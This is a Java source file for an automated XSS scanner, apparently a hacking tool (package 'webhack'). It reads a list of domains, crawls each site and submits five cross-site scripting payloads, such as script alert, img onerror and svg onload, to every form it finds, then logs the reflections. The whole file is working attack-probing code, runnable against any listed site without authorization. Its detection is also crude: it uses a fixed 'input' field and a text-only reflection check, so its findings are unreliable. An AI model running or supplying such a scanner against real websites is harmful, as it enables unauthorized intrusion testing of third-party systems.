package webhack.xss;

import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.select.Elements;

import java.io.*;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLEncoder;
import java.util.*;

public class TrueXSS {
    private int stet = 0;
    private Set<String> visitedUrls = new HashSet<>();

    public TrueXSS(String bd, String log) {
        PrintWriter pw = null;
        BufferedReader br = null;
        try {
            pw = new PrintWriter(log);
            ArrayList<String> masWebsiteUrl = new ArrayList<>();
            br = new BufferedReader(new FileReader(bd));
            String l;
            while ((l = br.readLine()) != null) {
                masWebsiteUrl.add("http://" + l);
            }

            for (String websiteUrl : masWebsiteUrl) {
                System.out.println("---------------------------");
                crawlWebsite(websiteUrl, log);
                System.out.println("---------------------------");
            }
            System.out.println("Количество найденных XSS: " + stet);
        } catch (Exception e) {
            System.out.println(";( Error - " + e);
        } finally {
            if (pw != null) pw.close();
            try {
                if (br != null) br.close();
            } catch (IOException e) {
                System.out.println(";( Error - " + e);
            }
        }
    }

    private void crawlWebsite(String url, String log) {
        Queue<String> queue = new LinkedList<>();
        queue.add(url); // Начинаем с начального URL

        while (!queue.isEmpty()) {
            String currentUrl = queue.poll(); // Берем URL из очереди

            if (visitedUrls.contains(currentUrl)) {
                continue; // Если уже посещали, пропускаем
            }
            visitedUrls.add(currentUrl); // Добавляем в посещенные

            try {
                Document document = Jsoup.connect(currentUrl).get();
                List<FormData> forms = findForms(document);
                checkForXSS(forms, url, log, "<script>alert('xss')</script>");
                checkForXSS(forms, url, log, "<img src="+'"'+"javascript:alert('xss')"+'"'+"/>");
                checkForXSS(forms, url, log, "<img src='#' onerror=alert('xss') />");
                checkForXSS(forms, url, log, "<svg/onload=alert('xss')>");
                checkForXSS(forms, url, log, '"'+" autofocus onfocus=alert("+"'"+"XSS"+"'"+")//");

                // Извлечение всех ссылок
                Elements links = document.select("a[href]");
                for (Element link : links) {
                    String linkUrl = link.absUrl("href"); // Получаем абсолютный URL
                    if (isSameDomain(url, linkUrl) && !visitedUrls.contains(linkUrl)) { // Проверяем домен и посещенность
                        queue.add(linkUrl); // Добавляем в очередь
                    }
                }
            } catch (Exception e) {
                System.out.println(";( Error processing " + currentUrl + ": " + e.getMessage());
            }
        }
    }

    private boolean isSameDomain(String baseUrl, String targetUrl) {
        try {
            URL base = new URL(baseUrl);
            URL target = new URL(targetUrl);
            return base.getHost().equals(target.getHost()); // Сравнение доменов
        } catch (MalformedURLException e) {
            return false;
        }
    }

    private List<FormData> findForms(Document document) {
        List<FormData> forms = new ArrayList<>();
        Elements formElements = document.select("form");

        for (Element form : formElements) {
            String action = form.attr("action");
            String method = form.attr("method").toLowerCase();
            Elements inputElements = form.select("input[name]");

            List<String> inputNames = new ArrayList<>();
            for (Element input : inputElements) {
                inputNames.add(input.attr("name"));
            }

            forms.add(new FormData(action, method, inputNames));
        }
        return forms;
    }
    private void checkForXSS(List<FormData> forms, String targetUrl, String log_file, String payload) {
        BufferedWriter writer = null;
        try {
            writer = new BufferedWriter(new FileWriter(log_file, true));
        } catch (IOException e) {
            System.out.println(";( Error  -" + e);
        }

        for (FormData form : forms) {
            String url = form.action.isEmpty() ? targetUrl : form.action; // Обработка относительных URL
            if (!url.startsWith("http")) {
                url = targetUrl + url; // Замените на базовый URL
            }

            try {
                if ("post".equals(form.method)) {
                    // Отправка POST-запроса с payload
                    Document response = Jsoup.connect(url)
                            .data("input", payload) // Замените "input" на нужное имя поля
                            .post();

                    // Проверка ответа на наличие payload
                    if (response.body().text().contains(payload)) {
                        stet++;
                        if (!log_file.equals("n") && !log_file.equals("N")) {
                            writer.write("($_$>) XSS found at: " + url + " with payload: " + payload + "\n");
                        }
                        System.out.println("($_$>) XSS found at: " + url + " with payload: " + payload + "\n");
                    }
                } else {
                    // Для GET-запроса можно просто добавить payload в параметры URL
                    String testUrl = url + "?input=" + URLEncoder.encode(payload, "UTF-8");
                    Document response = Jsoup.connect(testUrl).get();

                    // Проверка ответа на наличие payload
                    if (response.body().text().contains(payload)) {
                        stet++;
                        if (!log_file.equals("n") && !log_file.equals("N")) {
                            writer.write("($_$>) XSS found at: " + testUrl + " with payload: " + payload + "\n");
                        }
                        System.out.println("($_$>) XSS found at: " + testUrl + " with payload: " + payload + "\n");
                    } else {
                        System.out.println(";( XSS Error No found on: " + url);
                    }
                }

                writer.flush();

            } catch (IOException e) {
                System.out.println(";( Error sending payload to " + url);
            }
        }

        if (writer != null) {
            try {
                writer.close();
            } catch (IOException e) {
                System.out.println(";( Error closing writer: " + e);
            }
        }
    }
    class FormData {
        String action;
        String method;
        List<String> inputNames;

        public FormData(String action, String method, List<String> inputNames) {
            this.action = action;
            this.method = method;
            this.inputNames = inputNames;
        }
    }
}
